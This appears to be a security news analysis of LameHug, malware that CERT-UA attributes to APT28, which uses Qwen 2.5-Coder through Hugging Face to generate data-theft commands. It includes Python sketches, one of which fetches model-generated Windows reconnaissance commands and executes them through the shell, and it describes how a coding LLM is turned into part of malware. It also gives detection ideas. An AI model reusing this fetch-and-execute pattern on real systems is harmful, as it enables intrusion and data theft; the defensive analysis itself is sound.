A newly discovered malware strain uses a coding-focused AI model to generate custom data-theft commands on the fly.
Ukraine’s national cybersecurity agency (CERT-UA) has identified a new malware family called LameHug, which uses a large language model (LLM) to generate real-time commands for compromising Windows systems. The malware is attributed to the Russian state-linked group APT28, also known as Fancy Bear or STRONTIUM.
LameHug is delivered through phishing emails that impersonate government officials, arriving as a ZIP archive that contains the malware's loader files. Once executed, it queries Hugging Face's API to reach Qwen 2.5-Coder-32B-Instruct, a code-generating LLM developed by Alibaba Cloud.
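CERT-UA's description implies a thin client-side pattern: send a natural-language prompt to the hosted model and read text back. Below is a minimal sketch of that call, assuming the public Hugging Face Inference API endpoint and a placeholder token; the exact endpoint and authentication LameHug uses are not confirmed in the report.

```python
import requests

# Public Inference API pattern for a hosted model; whether LameHug hits
# this exact endpoint is an assumption.
API_URL = "https://api-inference.huggingface.co/models/Qwen/Qwen2.5-Coder-32B-Instruct"
HEADERS = {"Authorization": "Bearer hf_xxx"}  # placeholder token

def generate_command(prompt: str) -> str:
    """Send a natural-language prompt and return the model's text output."""
    resp = requests.post(API_URL, headers=HEADERS, json={"inputs": prompt}, timeout=30)
    resp.raise_for_status()
    # Text-generation responses arrive as [{"generated_text": ...}].
    return resp.json()[0]["generated_text"]
```

From there, any natural-language tasking can be turned into an executable command string at run time.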
LameHug dynamically prompts the LLM to create system reconnaissance and data-theft commands, allowing it to adapt its behavior on compromised machines without relying on static payloads. The generated commands can perform actions such as the following (a sketch of the prompt-to-command loop appears after the list):
- Gathering system details and saving them to info.txt
- Recursively locating files in the Documents, Desktop, and Downloads folders
- Exfiltrating collected data using SFTP or HTTP POST requests
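Each capability above would then map to its own prompt rather than to embedded code. The prompt wording below is hypothetical (CERT-UA's recovered prompts are not quoted here), but it illustrates how such a loop could drive the listed actions:

```python
import subprocess
import requests

API_URL = "https://api-inference.huggingface.co/models/Qwen/Qwen2.5-Coder-32B-Instruct"
HEADERS = {"Authorization": "Bearer hf_xxx"}  # placeholder, as in the sketch above

# Hypothetical prompt templates for the behaviors listed above.
PROMPTS = [
    "Write one Windows command that gathers system details and appends them to info.txt",
    "Write one Windows command that recursively lists files under Documents, Desktop, and Downloads",
]

for prompt in PROMPTS:
    resp = requests.post(API_URL, headers=HEADERS, json={"inputs": prompt}, timeout=30)
    command = resp.json()[0]["generated_text"]
    # The command string exists only in memory at this point; the sample
    # on disk carries prompts, not commands.
    subprocess.run(command, shell=True)
```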
CERT-UA identified at least three file names used to deliver LameHug: Attachment.pif, AI_generator_uncensored_Canvas_PRO_v0.9.exe, and image.py. The agency attributes the activity to APT28 with medium confidence and notes that routing traffic through legitimate infrastructure such as Hugging Face could make the malware's communications harder to detect.
CERT-UA did not confirm whether the AI-generated commands executed successfully or exfiltrated any data. The agency did, however, highlight the novelty of using LLMs within malware for adaptive attack execution and the difficulty traditional security methods may have in detecting such behavior.
The discovery of LameHug marks one of the first known uses of a large language model to generate system commands within active malware. By prompting an AI model to create attack instructions in real time, the malware avoids the static payloads that traditional defenses are designed to catch. CERT-UA's findings show how threat actors are beginning to test AI tools like Qwen 2.5 in practical cyber operations, and how the approach may complicate detection and response with current security tools.
Qwen 2.5-Coder is an open-source coding LLM developed by Alibaba Cloud. It was likely chosen for its ability to convert natural-language prompts into shell commands and executable scripts, which makes it well suited to generating dynamic attack instructions.
LLM-generated commands are created in real time and aren't hardcoded into the malware. This makes it harder for antivirus or static analysis tools to flag them during scans.
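The gap is easy to demonstrate. A signature scan that matches hardcoded command fragments, sketched here with hypothetical keywords, has nothing to catch when the only embedded text is a natural-language prompt:

```python
# Hypothetical command fragments a static signature scan might match.
SUSPICIOUS_STRINGS = [b"systeminfo", b"Invoke-WebRequest", b"net user", b"reg query"]

def static_scan(sample: bytes) -> list:
    """Return any hardcoded command fragments found in the sample."""
    return [s for s in SUSPICIOUS_STRINGS if s in sample]

# A sample that embeds a finished command is flagged...
print(static_scan(b'os.system("systeminfo > info.txt")'))  # [b'systeminfo']
# ...but one that embeds only a prompt and fetches the command at run
# time gives the signature nothing to match.
print(static_scan(b'"Write one command that saves system details"'))  # []
```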
Hugging Face’s API acted as the bridge between the malware and the LLM. Because the platform is legitimate and widely used, it may help the malware’s communications blend in with normal traffic.
The technique could plausibly be reused elsewhere. The ability to prompt an LLM during an attack could be adapted to automate lateral movement, privilege escalation, or even real-time evasion tactics in different environments.
Defensive strategies may include monitoring outbound connections to LLM APIs, using behavioral detection over signature-based tools, and restricting external script execution on sensitive endpoints.
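As a concrete starting point for the first of those strategies, outbound contact with hosted-model endpoints can be flagged from existing proxy logs. A minimal sketch, assuming a simple space-delimited log format and an illustrative hostname list (both assumptions):

```python
# Hostnames of hosted-inference APIs worth flagging; extend per environment.
LLM_API_HOSTS = {
    "api-inference.huggingface.co",
    "api.openai.com",
    "generativelanguage.googleapis.com",
}

def flag_llm_traffic(log_path: str) -> None:
    """Print proxy-log lines whose destination host is a known LLM API."""
    with open(log_path) as log:
        for line in log:
            fields = line.split()
            # Assumed format: timestamp  src_ip  dest_host  url  status
            if len(fields) >= 3 and fields[2] in LLM_API_HOSTS:
                print("LLM API contact:", line.rstrip())

flag_llm_traffic("proxy.log")  # hypothetical log file
```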